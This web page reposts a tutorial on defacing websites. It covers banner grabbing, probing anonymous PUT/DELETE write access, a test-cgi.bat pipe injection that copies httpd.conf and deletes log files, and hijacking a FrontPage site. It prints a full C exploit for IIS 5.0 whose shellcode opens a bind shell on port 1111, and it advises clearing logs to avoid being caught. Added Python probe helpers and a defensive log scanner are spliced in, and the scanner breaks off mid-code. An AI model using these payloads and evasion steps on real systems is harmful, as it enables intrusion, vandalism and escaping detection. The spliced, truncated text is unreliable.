Defacing Website

Date post: 16-Apr-2015
Upload: mad-badh
Description: Defacing Website Guide

Defacing Websites

Defacing websites is one of the most talked-about activities in IT (Information Technology) as well as in the underground world (the hackers' world). Crackers, script kiddies and "uberhackers" build their path to fame by defacing websites. It is not always for fame; websites are also defaced to spread a message among the public. There are many reasons for website defacement; I have seen hackers deface websites just for fun and amusement. In this article I will explain the mechanics of website defacement.

Basically, websites are defaced by exploiting vulnerabilities in the web server, gaining a shell (ideally with administrator or root privileges) and then injecting malicious content into the target page residing on the server. In this tutorial I will explain how to exploit known vulnerabilities, including some methods of exploiting Microsoft IIS, historically one of the most frequently attacked web servers.

Web Server Detection

I do not consider defacing websites to be hacking in itself. To deface a website you have to search for exploits, have programming skill, and spend a lot of time on trial and error.

In every piece of software, every website and every web server there exist vulnerabilities (mistakes in the mechanism of the program). By exploiting them, one can get root (administrator-privilege) access to the system or server running the vulnerable software, and with that access the website is defaced. You can find loads of recently discovered vulnerabilities on sites like:

www.securityfocus.com
www.packetstormsecurity.com

These sites even offer the exploit code and the method of exploitation.

You can also discover new vulnerabilities in web servers and sites with a web security scanner.

Tools of the Trade

Nikto Security Scanner
Stealth HTTP Security Scanner
Acunetix Web Security Scanner

So before defacing a website you must know which server software the target website is running. After finding the server software you look for vulnerabilities and exploits for that particular software, so identifying the server software is essential.

Web server detection is easy and the method is obvious. When a request is sent to a web server in raw mode (that is, through telnet), the server answers with a 400 Bad Request, a 200 OK or a 403 Forbidden response, and on a default installation that response carries a Server header naming the web server software and its version.

So what we need to do is telnet to port 80 of the web server and send a request so that the server responds with a 400 Bad Request or a 200 OK message containing the server software and version information.

NOTE: Port 80 is the default HTTP port for web servers.

Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
GET / HTTP/1.1\r\n\r\n
Host: server-software
<enter>
<enter>
<enter>

HTTP/1.1 403 Forbidden
Date: Fri, 17 Mar 2006 13:00:20 GMT
Server: Apache/1.3.22 (Win32)
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /
on this server.<P>
<HR>
<ADDRESS>Apache/1.3.22 Server at www.apache.org Port 80</ADDRESS>
</BODY></HTML>

Connection to host lost.

I have telnetted to port 80 of www.hackingtheworld.ilitehost.com, so I get the above output in my command prompt.

Okay, I hope you have figured out what I mean. It is a plain telnet response. You have to telnet to port 80 of a web server or website.

NOTE: I have telnetted to the domain name; you can telnet to the IP address as well.

So after telnetting to the web server name or the website you get a blank screen. In the blank screen type a request such as GET / HTTP/1.1 (the \r\n\r\n shown above stands for the carriage-return/line-feed pairs, that is, Enter pressed twice), then something like Host: server-software, then press <enter> a few more times until you get the server's response. The server responds with its software information in the Server header.

Caveat: administrators can shorten or remove the Server header (Apache's ServerTokens directive, or URLScan's RemoveServerHeader on IIS), so treat the banner as a hint to be confirmed with a scanner such as Nikto, not as proof.
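The probe above in code, as an added example that is not part of the original tutorial: it builds the same raw request the telnet session types, parses the Server header out of the reply, and can be pointed at a live host. The sample responses are constructed from the ones shown on this page, and the probe_host helper, its timeout and the host name "server-software" are assumptions of this example, not the author's.

```python
import socket

# Added example, not from the original tutorial: the raw banner-grab the
# telnet session above performs, with the Server header parsed out.

CRLF = "\r\n"


def build_probe(path="/", host="server-software"):
    """The minimal HTTP/1.1 request typed into telnet above."""
    return f"GET {path} HTTP/1.1{CRLF}Host: {host}{CRLF}{CRLF}".encode()


def parse_response(raw):
    """Return (status_code, headers) from a raw HTTP response (bytes)."""
    head = raw.partition(b"\r\n\r\n")[0]
    lines = head.decode("iso-8859-1", "replace").split("\r\n")
    parts = lines[0].split(" ", 2)          # e.g. ["HTTP/1.1", "403", "Forbidden"]
    status = int(parts[1])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def fingerprint(raw):
    """(status, Server header); the header is None when the banner is hidden."""
    status, headers = parse_response(raw)
    return status, headers.get("server")


def probe_host(host, port=80, timeout=5.0):
    """Live probe (assumed helper): connect, send build_probe(), read the headers."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe(host=host))
        data = b""
        while b"\r\n\r\n" not in data:
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
    return fingerprint(data)


# Constructed sample responses, modelled on the ones shown in this tutorial.
APACHE_403 = (b"HTTP/1.1 403 Forbidden\r\n"
              b"Date: Fri, 17 Mar 2006 13:00:20 GMT\r\n"
              b"Server: Apache/1.3.22 (Win32)\r\n"
              b"Connection: close\r\n"
              b"Content-Type: text/html; charset=iso-8859-1\r\n"
              b"\r\n"
              b"<HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD></HTML>")
IIS_400 = (b"HTTP/1.1 400 Bad Request\r\n"
           b"Server: Microsoft-IIS/5.0\r\n"
           b"Date: Thu, 17 Feb 2006 04:18:45 GMT\r\n"
           b"Content-Type: text/html\r\n"
           b"Content-Length: 87\r\n"
           b"\r\n")
# A hardened server that strips the banner: the probe learns nothing.
HARDENED_200 = (b"HTTP/1.1 200 OK\r\n"
                b"Content-Type: text/html\r\n"
                b"\r\n")

if __name__ == "__main__":
    for sample in (APACHE_403, IIS_400, HARDENED_200):
        print(fingerprint(sample))
```

The third sample is the case the caveat above describes: a 200 OK with no Server header, where the banner grab tells you nothing and you fall back to behavioural fingerprinting.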

Examining the Web Server

If you are using Microsoft IIS (Internet Information Services) you must have noticed that the default installation keeps the website root in C:\Inetpub\wwwroot. The directories the server software exposes are called virtual directories. In a web server each virtual directory is given its own set of permissions: Read, Write, Script execution (server-side pages such as ASP and CGI) and Execute (executables such as DLLs and EXEs).

Now I am going to describe methods of analysing the permissions of a virtual directory residing on a web server.

READ ACCESS

Whenever you visit a website through your web browser you type in the domain name. Do you know what happens when you do that? When you type in the domain name and press Enter, the browser resolves it and connects to port 80 (the HTTP port) of the IP address linked with the domain name.

For example: you type www.hackingtheworld.ilitehost.com into your browser's address bar. The IP (Internet Protocol) address of this site (printed as 7229654 in the original text, with the dots lost) is resolved, and the request goes to that address for /index.html, index.php, index.asp, index.jsp or whatever index page is configured on the web server. So once you press Enter you arrive at Hacking the World's official website. On the website you are able to read content from its wwwroot. If the wwwroot directory contains ASP, PHP or JSP pages, those server-side pages are executed and the HTML they generate is passed to the browser (client) by IIS (or any other web server) dynamically. When you are able to read a document from a given directory, that signals the directory is readable. Normally, directories containing database files are denied read access for security reasons.

WRITE ACCESS

I will explain the HTTP protocol concisely before going into write access. HTTP is an application protocol of the TCP/IP stack. It was designed with the idea of sharing files across the Internet; HTTP is the acronym of Hyper Text Transfer Protocol, and the name itself describes it. Files can be downloaded from the server and, where the server allows it, uploaded to the server through HTTP.

NOTE: In the early days files could be uploaded to and downloaded from a server through HTTP without any authentication.

That technique was employed years ago. Computer enthusiasts soon realised that it was a huge security threat, so new mechanisms were developed to subdue it. Nowadays web servers are designed and configured to give write access only to selected virtual directories, and normally only to authenticated users.

TIP: Try telnetting to a web server and find out some good information about the server and its behaviour.

Now I am going to explain some commonly used HTTP methods supported by a web server.

GET: used by the browser (client) to request read access to a file residing on the server.

Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com
GET /index.html HTTP/1.1\r\n\r\n

Sidetrack: the HTML (Hyper Text Markup Language) source of the index.html page residing on the server is returned; if you request an ASP, PHP or other server-side page, the dynamically generated HTML is returned instead.

DELETE: the HTTP method for deleting files on the web server. It requires write access on the virtual directory where the file is to be deleted.

Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com
DELETE /index.html HTTP/1.1\r\n\r\n

Sidetrack: most probably you will get a 403 Forbidden (or 405 Method Not Allowed) error, as it is quite obvious that the wwwroot directory will never have write access.

PUT: used to create files on the server. It requires write access on the particular virtual directory where the file is to be created.

Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com
PUT /cc.txt HTTP/1.1\r\n\r\n

Sidetrack: most probably you will get a 403 Forbidden (or 405 Method Not Allowed) error, as it is quite obvious that the wwwroot directory will never have write access.

ECHO: the publishing tool. This is the same ECHO command used in DOS (Disk Operating System) batch files, and its output can be redirected into a file. Note that ECHO is not an HTTP method: sent to a web server over telnet as below it only produces a 400 or 405 error. It becomes useful once you already have command execution on the host, for example through the test-cgi.bat pipe described later in this tutorial.

Microsoft Telnet> open www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com
ECHO Site defaced by SB >> index.html HTTP/1.1\r\n\r\n

TIP: SB is the acronym of my name, Shubham Bhattacharya. When you deface a site you can also use the acronym of your name.

PROPFIND: a WebDAV request used for directory surfing, that is, listing the resources in a directory and their properties.

NOTE: On IIS it is used as an administrative tool for web server analysis; IIS 5.0 ships with WebDAV enabled.

Microsoft Telnet> open www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com
PROPFIND / HTTP/1.1
Host: iis-server
Content-Length: 0

Sidetrack: you will most likely get a 403 Forbidden error, since PROPFIND on the web root is normally disabled; a 207 Multi-Status response means the listing is available.

Well, you must be wondering how you can test the write permission of a particular directory on an IIS server.

To test the write permission for a particular directory on IIS, follow the steps given below.

- To test whether write access is enabled for anonymous web clients, telnet to port 80 of the web server or website and make the following request:

PUT /scripts/htw.asp HTTP/1.1
Host: iis-server
Content-Length: 10 <enter><enter>

Once you make this request the server should respond with a 100 Continue message:

HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Sun, 17 Feb 2006 10:53:00 GMT

On receiving the above, type 10 letters:

XXXXXXXXXX

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Sun, 17 Feb 2006 10:56:08 GMT
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

If the server responds with this 201 Created response, write permission is enabled. The Location header echoes the path of the resource you created, and the Allow header lists every method the directory accepts, so one probe also tells you whether DELETE, COPY and MOVE are open.
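The same probe as code, as an added example that is not part of the original tutorial: it builds the two-step PUT exchange above, classifies whatever the server answers to the PUT, DELETE and PROPFIND probes, and reads the Allow header of a 201 Created to list the other write methods the directory exposes. The responses are constructed from the ones shown on this page; the probe_put helper, its timeout and the method sets are this example's assumptions, not the author's code.

```python
import socket

# Added example, not from the original tutorial: classify the server's reply
# to the PUT / DELETE / PROPFIND probes shown above and read the Allow header
# of a 201 Created to see which other write methods the directory exposes.

WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK"}
LISTING_METHODS = {"PROPFIND", "SEARCH"}


def build_put(path, body, host="iis-server"):
    """Headers and body of the PUT probe; the body is sent after 100 Continue."""
    head = (f"PUT {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode()
    return head, body


def status_of(raw):
    """Status code from the first line of a raw response."""
    return int(raw.split(b" ", 2)[1])


def allowed_methods(raw):
    """Set of methods named in the Allow header, empty if there is none."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"allow":
            return {m.strip().upper() for m in value.decode().split(",") if m.strip()}
    return set()


def classify(raw):
    """What a probe response says about the virtual directory."""
    code = status_of(raw)
    if code == 100:
        return "headers accepted, send the body"
    if code in (200, 201, 204):
        return "writable"
    if code == 207:
        return "listable (WebDAV Multi-Status)"
    if code in (401, 403):
        return "denied"
    if code in (405, 501):
        return "method not supported"
    return f"unexpected {code}"


def exposed_methods(raw):
    """Write and listing methods the server advertises in Allow."""
    return allowed_methods(raw) & (WRITE_METHODS | LISTING_METHODS)


def probe_put(host, path, body=b"X" * 10, port=80, timeout=5.0):
    """Live driver (assumed helper): run the two-step PUT exchange from above."""
    head, payload = build_put(path, body, host)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(head)
        first = sock.recv(4096)
        if status_of(first) != 100:
            return classify(first), exposed_methods(first)
        sock.sendall(payload)
        second = sock.recv(4096)
    return classify(second), exposed_methods(second)


# Constructed responses, modelled on the exchange shown in this tutorial.
CONTINUE = b"HTTP/1.1 100 Continue\r\nServer: Microsoft-IIS/5.0\r\n\r\n"
CREATED = (b"HTTP/1.1 201 Created\r\n"
           b"Server: Microsoft-IIS/5.0\r\n"
           b"Location: http://iis-server/dir/my_file.txt\r\n"
           b"Content-Length: 0\r\n"
           b"Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, "
           b"PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK\r\n"
           b"\r\n")
FORBIDDEN = b"HTTP/1.1 403 Forbidden\r\nServer: Microsoft-IIS/5.0\r\n\r\n"
```

A 403 on the PUT is the expected answer from a correctly configured web root; a 201, or a 405 whose Allow header still lists PUT for some other directory, is the finding worth writing up.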

EXECUTION ACCESS

Server-side pages such as ASP, PHP and JSP, or DLLs, are used in advanced database-driven dynamic websites that generate HTML dynamically and send it to the client (web browser). These server-side pages and other executables, including DLL and EXE files, need execute permission on the virtual directory where they are kept.

NOTE: DLLs, EXEs etc. need execute permission; keep them in a single virtual directory so that the permission is granted in one place only.

DIRECTORY SURFING

It is often seen that web servers, or more specifically the virtual directories of web servers, are configured to provide directory browsing to all clients, or to special clients after proper authentication. Directory browsing means that you can list the files and folders present in a virtual directory just as you see them on your standalone system. Most web server administrators turn this feature off, but exploit code can sometimes be used to obtain a directory listing of the virtual directory anyway.

EXPLOIT FOR DIRECTORY LISTING IN APACHE

If you are not familiar with Apache, let me give you a brief description. Apache is a server that you configure with directives in text files. These directives are kept in the httpd.conf file, which lives in the conf folder under the installation directory (C:\Apache Group\Apache\conf in a default Apache installation on a typical Windows system). This file contains all the settings of the web server, and if we get our hands on it we learn every setting, including the location of the log files, directory permissions, write access, authentication levels and so on.

So now let's get on with the exploit. Apache is the most widely used web server. Older Apache for Windows distributions shipped a batch file in the cgi-bin directory named test-cgi.bat, whose purpose is to test the privileges of the cgi-bin directory.

NOTE: The cgi-bin directory contains all the CGI and Perl scripts.

It is quite obvious that the cgi-bin virtual directory has execute permission, and that condition is exploited to perform pernicious attacks. A .bat file under Apache for Windows is executed by spawning the DOS (Disk Operating System) command shell, and the query string is handed to that shell. So we can use the | (pipe) character along with the batch file to execute arbitrary commands on the remote server.

NOTE: If you don't know how to type the | (pipe) character, don't worry: it is on the key just beside your Backspace key (Shift+\).

So the attack URL will be like this:

http://www.target.com/cgi-bin/test-cgi.bat?|copy+conf\httpd.conf+htdocs\httpd.conf

Through the above URL I have copied the httpd.conf file from the conf directory into htdocs. The conf directory is not reachable through the Apache web root (the htdocs virtual folder), but the copy now is. So we can easily download httpd.conf using the following URL:

http://target.com/httpd.conf

since it now resides in the Apache web root. Through this method you get the httpd.conf file, and from it some worthwhile information about the web server.

Inspecting known vulnerabilities

Generally websites are defaced and hacked using vulnerabilities in the server software or in the operating system running it. Most "hackers" deface websites using vulnerabilities; please note I am talking about hackers, not script kiddies who deface websites using dubious point-and-click tools. So you must know what a vulnerability is. If you don't, let me tell you: a vulnerability is an existing flaw or defect in the software that allows a hacker or cracker to take control of the system or issue arbitrary commands to the server. In every piece of software, application or tool, vulnerabilities exist.

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guninski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

The above sites carry the latest vulnerabilities with exploit code. Even if you are an elite or a professional you will find the information useful.

Working with Exploits

I must say this is the most exciting part of the tutorial. Okay, so www.victim.com is the target site. Through the methods I explained earlier we have found out that the website is running Microsoft IIS. So it is time to find a vulnerability; I am using the Acunetix Web Security Scanner to scan for them. You must know programming languages like Perl or C, and socket programming, because you need them to compile and adapt the exploits. Once you find a vulnerability, try exploiting it from your client (the browser, or a compiled exploit).

MICROSOFT FRONTPAGE EXTENSION EXPLOIT

This is a method of website defacement using the Microsoft Web Publishing Wizard. With it one can replace pages on websites that have the FrontPage Server Extensions installed and allow authoring without proper authentication.

Follow the steps given below:

Telnet to port 80 of the target website or web server:

C:\>telnet www.victim.com 80

You will get a blank screen. Type GET and keep pressing Enter till the web server responds to your request:

GET <ENTER><ENTER>

NOTE: Web servers running IIS commonly have the FrontPage Server Extensions installed; the method only works when they are installed and misconfigured so that anonymous users may author pages.

So after pressing Enter you will get the following:

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Thu, 17 Feb 2006 04:18:45 GMT
Content-Type: text/html
Content-Length: 87

Once you get the 400 Bad Request you have to search for the home page. Most sites have the default home page at one of:

http://www.victimserver.com/main.asp
http://www.victimserver.com/index.html
http://www.victimserver.com/index.htm
http://www.victimserver.com/index.asp
http://www.victimserver.com/main.htm
http://www.victimserver.com/default.htm
http://www.victimserver.com/default.asp
http://www.victimserver.com/default.html

Keep trying all the possible file names until a page loads. If the file doesn't exist you get a 404 error.

Let us say you have found the home page at www.victim.com/index.html. Design the page you want to upload, or modify the home page (here index.html), and save it as index.html.

Now open the Web Publishing Wizard and follow the steps given below:

- Open the Microsoft Web Publishing Wizard.
- Browse to the file that you are going to upload; here it is index.html.
- You get a screen where you have to name the web server. Type in anything and click Advanced.
- Select the service provider from the drop-down box. This is the kind of upload it is going to do; since your motive is to deface the site, select the FrontPage Extended Web option, because this method of defacing works only for FrontPage-enabled sites.
- Type the URL of the victim server's home page in the given box; here it is www.victim.com/index.html.
- Specify the URL that you type in the web browser to access the victim website.
- Select the connection method that you use to access the Internet.
- Click Finish. Voila, you have replaced the victim's home page with yours.

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know some exploit coding. I am going to present exploit code written in C, the most powerful language for this purpose.

/* Windows 2000 Server Exploit By CHINANSL Security Team
 * Tested on Windows 2000 Chinese Version, IIS 5.0, not patched.
 * Warning: THIS PROGRAM WILL ONLY TEST
 * CHINANSL Technology CO.,LTD  http://www.chinansl.com
 * keji@chinansl.com
 * Use MS VC++ to compile this piece of code (links against Ws2_32.lib).
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "Ws2_32")

int main(int argc, char *argv[])
{
    /* Value written into the request in place of "AAAA". */
    DWORD srcdata = 0x01e2fb1c - 4;        /* 0x00457474 */
    /* Address of the SHELLCODE, written in place of "BBBB". */
    DWORD jmpaddr = 0x00457494;            /* other values tried by the authors:
                                              0x77ebf094, 0x01e6fcec,
                                              "\x1c\xfb\xe6\x01", "\x0c\xfb\xe6\x01" */
    char *destIP;
    char *destFile;
    int webport;
    /* 16 bytes of padding, sent as the first chunk of the body. */
    char *pad = "\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02\x02" "PADP";
    WSADATA ws;
    SOCKET s;
    long result = 0;
    struct sockaddr_in addr;
    char buff[4096];
    char shellcodebuff[1024 * 8];
    char sendbuff[1024 * 16];
    int sendlen;

    /* Bind-shell payload: listens on TCP port 1111 and hands out cmd.exe. */
    char *shellcode =
        "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x89"
        "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
        "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
        "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
        "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
        "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
        "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
        "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
        "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
        "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
        "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
        "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
        "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
        "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
        "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
        "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
        "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
        "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
        "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
        "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
        "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
        "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
        "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
        "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
        "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
        "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
        "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
        "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
        "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
        "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
        "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
        "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
        "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
        "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
        "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
        "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
        "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
        "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
        "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
        "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
        "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
        "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
        "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
        "\xff\xff\x95\x18\xff\xff\xff";

    char *s1 = "POST ";
    char *s2 = "Accept: */*\r\n";
    char *s4 = "Content-Type: application/x-www-form-urlencoded\r\n";
    char *s5 = "Transfer-Encoding: chunked\r\n\r\n";
    char *sc = "0\r\n\r\n\r\n";

    if (argc != 4) {
        printf("%s ip port aspfilepath\n\n", argv[0]);
        printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n", argv[0]);
        puts(" programed by keji@chinansl.com");
        return 0;
    }
    destIP = argv[1];
    destFile = argv[3];
    webport = atoi(argv[2]);

    if (WSAStartup(0x0101, &ws) != 0) {
        puts("WSAStartup() error");
        return -1;
    }
    addr.sin_family = AF_INET;
    addr.sin_port = htons((u_short)webport);
    addr.sin_addr.s_addr = inet_addr(destIP);

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == INVALID_SOCKET) {
        puts("Socket create error");
        return -1;
    }
    if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
        puts("Cannot connect to the specified host");
        return -1;
    }

    /* NOP sled with the shellcode at its end, appended to the request path. */
    memset(shellcodebuff, 0x90, sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff) - strlen(shellcode) - 1],
           shellcode, strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff) - 1] = 0;

    /* Chunked POST body: a 0x10-byte pad chunk, then two 4-byte chunks whose
     * placeholders "AAAA" and "BBBB" are overwritten below with srcdata and
     * jmpaddr, then the terminating 0-length chunk. */
    memset(sendbuff, 0, sizeof(sendbuff));
    sprintf(sendbuff,
            "%s%s%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, sc);
    sendlen = strlen(sendbuff);
    *(DWORD *)strstr(sendbuff, "BBBB") = jmpaddr;
    *(DWORD *)strstr(sendbuff, "AAAA") = srcdata;

    result = send(s, sendbuff, sendlen, 0);
    if (result == -1) {
        puts("Send shellcode error");
        return -1;
    }

    memset(buff, 0, sizeof(buff));
    result = recv(s, buff, sizeof(buff), 0);
    /* An HTML error page coming back means the server survived the request,
     * so the overflow did not take. */
    if (strstr(buff, "<html>") != NULL) {
        shutdown(s, 0);
        closesocket(s);
        puts("Send shellcode error!Try again!");
        return -1;
    }
    shutdown(s, 0);
    closesocket(s);

    printf("\nUse <telnet %s 1111> to connect to the host\n", destIP);
    puts("If you cannot connect to the host,try run this program again!");
    return 0;
}

The above program is called exploit code. Exploits are written in powerful languages like C, Perl or sometimes Java, and each exploit is written for a specific vulnerability. These vulnerabilities were discovered in the past, and nowadays server software and operating systems are patched against them. So you can't just execute exploit code to break into a server: you must rework an exploit so that it fits your target. One more thing I must mention: keep yourself updated on the latest vulnerabilities by visiting the sites I mentioned earlier in the tutorial.

I think it is better that you code your own exploits in Perl or C in order to break into websites.

NOTE: I am talking about high-profile websites, not lame websites coded in Notepad.

Keeping yourself safe

You must be familiar with server software like Apache and Microsoft IIS, so you must know about the log files, which record every request the server receives. As they record everything, system administrators have no problem catching the malicious cracker or script kiddie: the log file holds the IP (Internet Protocol) address, and through the IP address the cracker or script kiddie can be traced.

NOTE: Read my tutorial on Gathering Information of Remote Host.

TIP: If you do not want to get busted you must clear the log files after you break into a web server.

CLEARING LOGS

You must clear the logs in order to save yourself from getting busted. On Apache for Windows you can use the same test-cgi.bat command-injection vulnerability described above (it is command injection, not cross-site scripting) to delete the log files, by requesting the following URL:

http://www.target.com/cgi-bin/test-cgi.bat?|DEL+log

NOTE: The above URL applies to the Apache server software. Keep in mind that the request which deletes the log is itself logged, since Apache writes the access-log entry after the request completes, and a log that is shipped to a remote syslog host or collected centrally cannot be cleared from the web server at all.
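The defender's side of the two test-cgi.bat requests on this page (the httpd.conf copy under "Exploit for directory listing in Apache" and the log-deleting URL just above), as an added example that is not part of the original tutorial: a scan over Apache combined-format access-log lines that flags shell metacharacters passed to a batch CGI, a configuration file served from the web root, and successful PUT/DELETE requests. The log lines are constructed for this example; the IP addresses, timestamps and the file name /scripts/htw.asp are assumptions, not data from the page.

```python
import re
from urllib.parse import unquote

# Added example, not from the original tutorial: detection logic run over
# constructed Apache access-log lines that reproduce the requests this page
# describes (test-cgi.bat pipe injection, fetching the copied httpd.conf,
# the log-deleting variant, and a successful anonymous PUT).

SAMPLE_LOG = """\
10.0.0.7 - - [17/Mar/2006:13:00:20 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
10.0.0.9 - - [17/Mar/2006:13:01:02 +0000] "GET /cgi-bin/test-cgi.bat?|copy+conf\\httpd.conf+htdocs\\httpd.conf HTTP/1.0" 200 0 "-" "-"
10.0.0.9 - - [17/Mar/2006:13:01:05 +0000] "GET /httpd.conf HTTP/1.0" 200 4120 "-" "-"
10.0.0.9 - - [17/Mar/2006:13:02:41 +0000] "GET /cgi-bin/test-cgi.bat?%7CDEL+log HTTP/1.0" 200 0 "-" "-"
10.0.0.11 - - [17/Mar/2006:13:03:00 +0000] "PUT /scripts/htw.asp HTTP/1.1" 201 0 "-" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
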